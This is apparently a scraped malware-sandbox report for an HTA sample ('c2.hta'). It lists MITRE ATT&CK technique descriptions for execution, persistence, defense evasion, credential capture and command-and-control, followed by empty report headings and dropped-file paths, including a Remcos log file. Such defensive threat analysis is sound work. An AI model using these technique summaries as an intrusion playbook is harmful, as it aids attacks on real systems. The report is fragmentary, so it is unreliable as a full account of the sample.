Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report c2.hta

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Data Obfuscation

HIPS / PFW / Operating System Protection Evasion

Stealing of Sensitive Information

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\remcos\logs.dat

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\d584b010-4338-4c3b-8053-62532ca9a404.tmp

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-250105020305Z-185.bmp

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

Windows Analysis Report
c2.hta

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre